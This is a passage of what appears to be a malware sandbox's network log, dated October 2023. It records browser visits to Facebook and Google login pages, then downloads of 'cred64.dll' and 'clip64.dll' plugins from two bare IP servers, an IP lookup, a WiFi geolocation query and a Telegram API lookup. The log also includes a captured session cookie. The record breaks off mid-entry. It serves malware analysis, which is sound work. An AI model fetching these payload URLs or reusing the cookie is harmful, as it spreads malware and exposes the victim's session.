permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: QOLp8E6NtzxxBWhC3gSM/Q==
X-FB-Debug: lKXe9c2xUsky6sKi4BgSHsUPvlyv1FKtEk0B+GejTd9HSbN2HMK+x2dW0n33oWuDTNP5eGrkTenRjDqSzpkDYg==
Date: Sat, 07 Oct 2023 12:02:46 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 586
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yL/r/C7x9HQY1590.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Thu, 03 Oct 2024 19:28:03 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: ceFGSA/WPFQCTlSAJIMsiw==
X-FB-Debug: tgLKpfg3+kQhJroGoN+d2ne1tljrasZID4hghZSiE+/qErT0y32Sc966EIlyf2K6Q8q8gLFq/vPaycyvDYZjNw==
Date: Sat, 07 Oct 2023 12:02:46 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 107850
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yh/r/bpW4eEg-2_W.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Sun, 29 Sep 2024 23:27:57 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: p1zId7RIE7NvnWFWeOhZrQ==
X-FB-Debug: GUuzOus+rq+Roz2/mujuCUmeMuKTjB9eFHyxeh6eVatVelI0g3v1rgirgV3zStOS9ZcFTwg2Vf38hL5JMj35Sw==
Date: Sat, 07 Oct 2023 12:02:47 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 592
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yd/r/D8yA-TXiNuk.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Sat, 28 Sep 2024 18:02:09 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: /FrrCQV24iVW5vxBJr6cuw==
X-FB-Debug: K8fU4SXVn3LiafIyWwcya9E6zXmlGwyTlyzY6II+Y3vv+zC3aLeWjHNjb6tbNVOhVsHvryTYs/YTTP4JK8s6gQ==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 4278
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yf/r/LgvwffuKmeX.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 04 Oct 2024 00:16:45 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: rE6VNnn8bW5M9+1AMZegFA==
X-FB-Debug: usFtFFQQJSNgqaTaKzrUvzJ1inPkK/PtmDPhfprMWjs5lz+3E+lU0pBZb706/ufz/of+OEKRAOU3unFzXglXjA==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 14668
-
GEThttps://static.xx.fbcdn.net/rsrc.php/v3i8JF4/yC/l/en_US/o1mLpHNkgsi.js?_nc_x=Ij3Wp8lg5KzIEXPLORE.EXERemote address:157.240.201.15:443RequestGET /rsrc.php/v3i8JF4/yC/l/en_US/o1mLpHNkgsi.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Wed, 02 Oct 2024 06:06:16 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: OaA85XbLEkzw2Lh36vz9WQ==
X-FB-Debug: 0AUj6QLOqt9epSjYecL3naZ2xoxMBRGV9tm1Mr0n71WAH2rYJ5MsCEB6b5+g42d20JwLf/Rf5BWPklPyJ/cLHw==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 19419
-
Remote address:157.240.201.15:443RequestGET /rsrc.php/v3/yZ/r/x4Eyp9nQ1uk.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: static.xx.fbcdn.net
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: application/x-javascript; charset=utf-8
Access-Control-Allow-Origin: *
Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
Expires: Fri, 04 Oct 2024 00:11:14 GMT
Cache-Control: public,max-age=31536000,immutable
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
X-Content-Type-Options: nosniff
timing-allow-origin: *
content-md5: fg3dEV/JelW6mKZKYUciRA==
X-FB-Debug: PRVEj/cgHyVS3OjQhldiVsy7B9S0q4/L1KQvJgaYRoRPC0GshM96VubKi0VPghE/Z4dzTb440M/8hlw/y/MvXQ==
Date: Sat, 07 Oct 2023 12:02:48 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 1296
-
Remote address:8.8.8.8:53Requestfbcdn.netIN AResponsefbcdn.netIN A157.240.201.35
-
Remote address:157.240.201.35:443RequestGET /security/hsts-pixel.gif?c=2 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: fbcdn.net
ResponseHTTP/1.1 302 Found
cross-origin-opener-policy: same-origin-allow-popups
Access-Control-Allow-Origin: *
Strict-Transport-Security: max-age=31536000; preload; includeSubDomains
Content-Type: text/html; charset="utf-8"
X-FB-Debug: 8lvnIHlhgV5XnczXs76ncFoO+hMcmtj9OR+1SFwtAj4LGkm7Coiu+o1sPQK5zMTi7rSQks1KKcWE75NIfkrPLA==
Date: Sat, 07 Oct 2023 12:02:47 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 0
-
Remote address:8.8.8.8:53Requestfbsbx.comIN AResponsefbsbx.comIN A157.240.201.35
-
Remote address:157.240.201.35:443RequestGET /security/hsts-pixel.gif HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: fbsbx.com
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: image/gif
content-security-policy: default-src data: blob: *.fbcdn.net *.fbsbx.com;script-src *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *.fbcdn.net *.fbsbx.com;connect-src *.fbcdn.net attachment.fbsbx.com blob: 'self' *.fbsbx.com;font-src *.fbsbx.com fbsbx.com *.fbcdn.net data:;img-src *.fbsbx.com *.fbcdn.net data: blob:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
Pragma: private
Cache-Control: private
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
X-Frame-Options: DENY
Access-Control-Allow-Origin: *
Strict-Transport-Security: max-age=31536000; preload; includeSubDomains
X-FB-Debug: /II+6fAyuVlhaEFSQDRqplOB2j9mAxOtKcGLMxYlqxsKgzV41YD0j5KAyLnw4BsA8/PoCRX8t5gAZqxmbiFgBg==
Date: Sat, 07 Oct 2023 12:02:47 GMT
Alt-Svc: h3=":443"; ma=86400
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:157.240.247.35:443RequestGET /images/cookies/cookie_info_popup_image_1.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.facebook.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Access-Control-Allow-Origin: *
content-md5: VavMdY6kTjDMa/KajpYRaQ==
Edge-Control: cache-maxage=86400s
Expires: Sun, 08 Oct 2023 07:53:06 GMT
Cache-Control: public,max-age=86400
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
X-Content-Type-Options: nosniff
timing-allow-origin: *
Strict-Transport-Security: max-age=15552000; preload
X-FB-Debug: 88x8Rwfd9qDWBiRV9GFZVCXRKAcPvvtIhF+PAeW4/Cm69BNH7TGWTixqBixWAcFR9O4uHQQHYPufXgPhacjXrQ==
Date: Sat, 07 Oct 2023 07:53:06 GMT
Connection: keep-alive
Content-Length: 50380
-
Remote address:157.240.247.35:443RequestGET /images/cookies/cookie_info_popup_image_3.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.facebook.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Access-Control-Allow-Origin: *
content-md5: YhcU5SV/bTVsWSaxO4wgGA==
Edge-Control: cache-maxage=86400s
Expires: Sun, 08 Oct 2023 05:04:26 GMT
Cache-Control: public,max-age=86400
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
X-Content-Type-Options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
Strict-Transport-Security: max-age=15552000; preload
X-FB-Debug: C79EYhXwImz/js8TNLSnHAucrGaQqMuqzNxGsZclYnVrKraZBoGbg/PBbOsBHEhQ8+BQHP5KZBMbcL1sfmTMUw==
Date: Sat, 07 Oct 2023 05:04:26 GMT
Connection: keep-alive
Content-Length: 47657
-
Remote address:157.240.247.35:443RequestGET /images/cookies/cookie_info_popup_image_4.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.facebook.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Access-Control-Allow-Origin: *
content-md5: Ae8VnBRpCv1xxClCp11bLQ==
Edge-Control: cache-maxage=86400s
Expires: Sun, 08 Oct 2023 05:03:34 GMT
Cache-Control: public,max-age=86400
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
X-Content-Type-Options: nosniff
timing-allow-origin: *
Strict-Transport-Security: max-age=15552000; preload
X-FB-Debug: gl7T2L1Upw+AD/fh3gDjd0Fyf0JM4RDxdJVoF0Cb2tx8BzKcb0YXL7h1a9jpI4V7X+rt4FgjvlsAWNPU8LvWng==
Date: Sat, 07 Oct 2023 05:03:34 GMT
Connection: keep-alive
Content-Length: 38147
-
Remote address:157.240.247.35:443RequestGET /images/cookies/cookie_info_popup_image_2.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: https://www.facebook.com/login
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.facebook.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Access-Control-Allow-Origin: *
content-md5: vq/Hc42i1NUD0re9tbXumw==
Edge-Control: cache-maxage=86400s
Expires: Sun, 08 Oct 2023 08:57:20 GMT
Cache-Control: public,max-age=86400
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
X-Content-Type-Options: nosniff
timing-allow-origin: *
Strict-Transport-Security: max-age=15552000; preload
X-FB-Debug: dNfxNJfmSKwMV3ld9T7n+rMRD9dwzQNr4OGdcXD3jTFUJrzoOe+GuxWgWnE95efAWbLsaocAi4Q4AU2Doivcxg==
Date: Sat, 07 Oct 2023 08:57:20 GMT
Connection: keep-alive
Content-Length: 47514
-
Remote address:8.8.8.8:53Requestaccounts.youtube.comIN AResponseaccounts.youtube.comIN CNAMEwww3.l.google.comwww3.l.google.comIN A142.250.179.206
-
GEThttps://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1256097051×tamp=1696680164550IEXPLORE.EXERemote address:142.250.179.206:443RequestGET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1256097051×tamp=1696680164550 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AYZoVhd5_ErQZ0pIgZabV8Tx7xzGgTAKmru56Gbp_QN-9oRv2Vv1M-JqqdSapGLw9oX-o3itkgPS&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S101681747%3A1696680166053313&theme=glif
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: accounts.youtube.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
X-Frame-Options: ALLOW-FROM https://accounts.google.com
Content-Security-Policy: frame-ancestors https://accounts.google.com
Content-Security-Policy: script-src 'nonce-W1QqQ7EMM-iCaxhG_HoXQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Sat, 07 Oct 2023 12:02:48 GMT
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: cross-origin
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Encoding: gzip
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Transfer-Encoding: chunked
-
Remote address:8.8.8.8:53Requestplay.google.comIN AResponseplay.google.comIN A142.251.36.14
-
Remote address:142.251.36.14:443RequestPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
Accept: */*
X-Goog-AuthUser: 0
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Referer: https://accounts.google.com/v3/signin/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: play.google.com
Content-Length: 859
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Access-Control-Allow-Origin: http://play.google.com
Cross-Origin-Resource-Policy: cross-origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: X-Playlog-Web
Content-Type: text/plain; charset=UTF-8
Content-Encoding: gzip
Date: Sat, 07 Oct 2023 12:02:49 GMT
Server: Playlog
Cache-Control: private
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Expires: Sat, 07 Oct 2023 12:02:49 GMT
Transfer-Encoding: chunked
-
Remote address:142.251.36.14:443RequestPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
Accept: */*
X-Goog-AuthUser: 0
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Referer: https://accounts.google.com/v3/signin/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: play.google.com
Content-Length: 613
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: NID=511=DwiqE7ihP1cyw5nvb0qSi_l42kqPdkYLwWqIYW94krA2ea1Z4akMg64w8XEyRI_9na-sGYPcwQlG84-Tu_h3O5Onb4iFavFWwLYYR1fTZy5s3aVBM2Z-niQdZufcxj63Z4pfpkbWsq9Zd8_a8P1fwKkepa_UfuyJzMXRgEdyhOg
ResponseHTTP/1.1 200 OK
Cross-Origin-Resource-Policy: cross-origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: X-Playlog-Web
Content-Type: text/plain; charset=UTF-8
Content-Encoding: gzip
Date: Sat, 07 Oct 2023 12:03:18 GMT
Server: Playlog
Cache-Control: private
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Transfer-Encoding: chunked
-
Remote address:142.251.36.14:443RequestPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
Accept: */*
X-Goog-AuthUser: 0
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Referer: https://accounts.google.com/v3/signin/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: play.google.com
Content-Length: 370
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: NID=511=DwiqE7ihP1cyw5nvb0qSi_l42kqPdkYLwWqIYW94krA2ea1Z4akMg64w8XEyRI_9na-sGYPcwQlG84-Tu_h3O5Onb4iFavFWwLYYR1fTZy5s3aVBM2Z-niQdZufcxj63Z4pfpkbWsq9Zd8_a8P1fwKkepa_UfuyJzMXRgEdyhOg
ResponseHTTP/1.1 200 OK
Cross-Origin-Resource-Policy: cross-origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: X-Playlog-Web
Content-Type: text/plain; charset=UTF-8
Content-Encoding: gzip
Date: Sat, 07 Oct 2023 12:03:18 GMT
Server: Playlog
Cache-Control: private
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Transfer-Encoding: chunked
-
Remote address:77.91.124.1:80RequestGET /theme/Plugins/cred64.dll HTTP/1.1
Host: 77.91.124.1
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
-
Remote address:77.91.124.1:80RequestGET /theme/Plugins/clip64.dll HTTP/1.1
Host: 77.91.124.1
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 30 Sep 2023 10:50:50 GMT
ETag: "16400-60691507c5cc0"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
-
Remote address:77.91.68.78:80RequestGET /help/Plugins/cred64.dll HTTP/1.1
Host: 77.91.68.78
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
-
Remote address:77.91.68.78:80RequestGET /help/Plugins/clip64.dll HTTP/1.1
Host: 77.91.68.78
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 06 Sep 2023 11:40:52 GMT
ETag: "16400-604af373ed405"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
-
Remote address:8.8.8.8:53Requesticanhazip.comIN AResponseicanhazip.comIN A104.18.115.97icanhazip.comIN A104.18.114.97
-
Remote address:104.18.115.97:80RequestGET / HTTP/1.1
Host: icanhazip.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 13
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=gweCdFHsX0j_34YxRW2X9_JgPskwBAUxCmeQHPa8M6k-1696680227-0-AdS7lQtJ2CB5dCxe3qTNIjh46J2JnUQh2v3VRVcNOFMjdiEktxILSpSr7DMpKi7Qy9PzSYDBsUxcrFcrHQF4HNE=; path=/; expires=Sat, 07-Oct-23 12:33:47 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 812600c01a322074-AMS
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestapi.mylnikov.orgIN AResponseapi.mylnikov.orgIN A104.21.44.66api.mylnikov.orgIN A172.67.196.114
-
Remote address:104.21.44.66:443RequestGET /geolocation/wifi?v=1.1&bssid=66:2e:76:02:65:c2 HTTP/1.1
Host: api.mylnikov.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: application/json; charset=utf8
Content-Length: 88
Connection: keep-alive
Access-Control-Allow-Origin: *
Cache-Control: max-age=2678400
CF-Cache-Status: MISS
Last-Modified: Sat, 07 Oct 2023 12:03:48 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lRsx3VIzX2EVvdVXdomgMgCrJ5Kj%2FzHL99pGcSM1rUxHTvzAIFzAdlHLZjAFIoz5CE4w0hGclDBh142Flqdnbf1vfjqd%2FABJ3mrVtcGBi9uWpk5bVDMm6pHOKeoWNvN1PI5q"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 812600c4cda70a64-AMS
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestwww.microsoft.comIN AResponsewww.microsoft.comIN CNAMEwww.microsoft.com-c-3.edgekey.netwww.microsoft.com-c-3.edgekey.netIN CNAMEwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netwww.microsoft.com-c-3.edgekey.net.globalredir.akadns.netIN CNAMEe13678.dscb.akamaiedge.nete13678.dscb.akamaiedge.netIN A104.85.1.163
-
Remote address:8.8.8.8:53Requestapi.telegram.orgIN AResponseapi.telegram.orgIN A149.154.167.220
-
2.3kB 6.8kB 12 13
HTTP Request
GET https://accounts.google.com/_/bscframeHTTP Response
200HTTP Request
GET https://accounts.google.com/generate_204?XYk76AHTTP Response
204 -
142.250.179.141:443https://accounts.google.com/v3/signin/_/AccountsSignInUi/data/batchexecute?rpcids=UEkKwb&source-path=%2Fv3%2Fsignin%2Fidentifier&f.sid=7493632062872831958&bl=boq_identityfrontendauthuiserver_20231001.08_p0&hl=en-US&_reqid=43365&rt=ctls, httpIEXPLORE.EXE6.7kB 130.5kB 67 116
HTTP Request
GET https://accounts.google.com/HTTP Response
302HTTP Request
GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2FHTTP Response
302HTTP Request
